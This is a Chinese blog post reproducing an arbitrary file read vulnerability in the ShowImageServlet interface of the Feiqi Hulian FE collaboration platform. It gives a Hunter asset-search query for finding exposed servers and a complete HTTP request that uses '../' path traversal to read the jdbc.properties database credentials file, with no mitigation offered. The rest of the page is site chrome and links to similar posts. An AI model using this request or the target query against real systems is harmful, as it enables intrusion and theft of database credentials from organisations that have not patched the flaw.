飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞

最新推荐文章于 2024-05-29 21:26:51 发布
最新推荐文章于 2024-05-29 21:26:51 发布
阅读量702 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/132853597
版权

一、漏洞描述

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。

二、影响版本

  • 飞企互联FE业务协作平台

三、资产测绘

  • hunterapp.name=="飞企互联 FE 6.0+"
  • 登录页面
    在这里插入图片描述

四、漏洞复现

GET /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=625AA3D846D23854252F5319B351BC58
Upgrade-Insecure-Requests: 1

在这里插入图片描述

xiaokp7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
飞企互联FE业务协作平台 ProxyServletUti 任意文件读取漏洞复现
0xSec
04-16 590
飞企互联 FE 业务协作平台 ProxyServletUti 接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
飞企互联FE业务协作平台 ShowImageServlet 文件读取漏洞复现
0xSec
12-21 946
飞企互联 FE 业务协作平台ShowImageServlet接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
飞企互联FE业务协作平台文件读取漏洞
weixin_43567873的博客
03-07 60
飞企互联FE业务协作平台文件读取漏洞
【1day】复现飞企互联 FE业务协作平台 ShowImageServlet 接口任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 503
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
漏洞复现--飞企互联FE业务协作平台ShowImageServlet任意文件读取
qq_53003652的博客
11-20 346
FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术,实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取
接口-飞企互联FE接口存在任意文件读取漏洞-1day未公开漏洞
weixin_43167326的博客
02-27 865
飞企互联协作平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的。
【0day】复现飞企互联 FE业务协作平台接口任意文件读取漏洞
记录并分享学习安全的知识点..
10-16 388
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
飞企互联企业运营管理平台存在任意文件读取
qq_36334672的博客
01-24 307
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
产业互联下面向云平台的智造供应链信息协作
05-06
本文提出云平台解决智造供应链信息协作的方案,该方案考虑了分布式协作理论应对庞大供应链业务数据的技术优势,构建了分布式下实时动态更新算法和共享数据资源池相结合的供应链企业数据互联互通协作模型,以提升产业...
号码百事通平台互联方案探讨
01-20
本文提出了两种通过平台互联来提供区域性号码百事通业务的新方案,并对实施号码百事通平台互联后的业务合作前景、赢利点及结算模式等进行了分析和说明,为全网性号码百事通业务的发展提供了新思路。
1彭州市全民健康信息平台互联互通接口标准-注册服务.docx
12-13
1彭州市全民健康信息平台互联互通接口标准-注册服务.docx
中医馆健康信息平台互联互通接口规范
11-23
中医馆健康信息平台互联互通接口规范 V0.9
网络互联实验平台代码 java网络互联实验平台代码
02-20
网络互联实验平台代码 java网络互联实验平台代码 基于SSM的网络互联实验平台代码 1、网络互联实验平台的技术栈、环境、工具、软件: ① 系统环境:Windows/Mac ② 开发语言:Java ③ 框架:SSM ④ 架构:B/S、MVC ⑤ ...
黑龙江等保测评:强化网络安全的北方防线
2301_79527080的博客
05-28 418
二、黑龙江等保测评的实践探索1. 法规政策引领:黑龙江省积极响应国家网络安全法律法规要求,出台了一系列地方性政策文件,明确了等保测评的实施标准和要求,为全省范围内的等保工作提供了法律依据和指导。2. 强化合规意识:等保测评的实施增强了组织和个人的网络安全合规意识,推动了网络安全法律法规的落实,形成了良好的网络安全文化氛围。3. 促进产业发展:等保测评需求带动了网络安全服务市场的繁荣,促进了本土网络安全企业的成长,同时也吸引了国内外先进技术和服务的引进,为黑龙江乃至东北地区的数字经济转型提供了安全保障。
2024年中国金融行业网络安全案例集
2301_76786857的博客
05-27 302
随着科技的飞速发展,金融行业与信息技术的融合日益加深,网络安全已成为金融行业发展的生命线。金融行业作为国家经济的核心支柱,正在面临着日益复杂严峻的网络安全挑战。因此,深入研究和探讨金融行业的网络安全问题,不仅关乎金融行业的稳健运行,更关系到国家经济的安全和社会的稳定。
“区块链技术在网络安全领域的革新应用与挑战“
2403_84237550的博客
05-29 507
区块链技术,以其去中心化、不可篡改和透明度高的特性,在网络安全领域展现出了巨大的革新潜力,同时也带来了一系列新的挑战。以下是区块链技术在网络安全领域的应用及其面临的主要挑战的深入分析。2. 身份认证与管理:利用区块链建立去中心化的身份认证系统,用户可以控制自己的数字身份,减少身份盗窃和欺诈的风险,提高身份验证的安全性和效率。2. 隐私保护:虽然区块链增强了数据的完整性,但公开的区块链设计可能暴露用户的部分交易信息,需要更先进的加密技术和匿名机制来加强隐私保护。
2022年全国职业院校技能大赛高职组“信息安全管理与评估”赛项第三阶段任务书
最新发布
Geek极安云科-致力于网络安全事业
05-29 340
请获取FTP服务器上对应的应用程序,连接Pwn1服务器的10000端口,对服务器进行漏洞利用,找出其中隐藏的flag,并将flag提交。请获取FTP服务器上对应的应用程序,连接Pwn2服务器的10001端口,对服务器进行漏洞利用,找出其中隐藏的flag,并将flag提交。flag格式 flag{}(30分)请获取FTP服务器上对应的文件进行分析,找出其中隐藏的flag,并将flag提交。图1 网络拓扑结构图。通过找到正确的flag值来获取得分,它的格式如下所示:flag{}
Web安全文件上传漏洞详解,文件上传漏洞原理、绕过方式和防御方案。
wangyuxiang946的博客
05-28 1918
结合实战靶场解析文件上传漏洞过滤及绕过方式,讲解文件上传原理和防御方式,
中医馆健康信息平台互联互通接口规范 v1.0
11-14
中医馆健康信息平台互联互通接口规范v1.0(以下简称规范)是为了推动中医馆健康信息平台之间的数据互联互通而制定的。该规范旨在统一不同平台之间的接口标准,实现健康信息数据的无缝交换和共享。 首先,规范明确了中医馆健康信息平台的数据格式和编码规范,包括基本信息、诊疗信息、处方信息等,确保不同平台之间的数据可以互相理解和解析。其次,规范规定了数据交换的安全性和可靠性要求,包括数据加密、身份验证等措施,以保障信息的安全性和完整性。再者,规范还明确了数据交换的协议和接口规范,确保不同平台之间可以通过统一的接口进行数据交换,提高数据交换的效率和便利性。最后,规范还规定了数据交换的监督和管理要求,包括数据交换的日志记录、监测等,以便对数据交换过程进行有效管理和监督。 通过中医馆健康信息平台互联互通接口规范v1.0的实施,不仅可以实现中医馆健康信息平台之间的数据互联互通,还能提升中医馆健康信息服务的效率和质量,为患者提供更加便利、安全的医疗健康服务。同时,规范的实施也有利于促进中医馆健康信息平台的健康发展,推动整个行业的信息化进程。希望各中医馆健康信息平台能够严格按照规范要求进行数据交换,共同推动中医馆健康信息领域的发展和进步。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值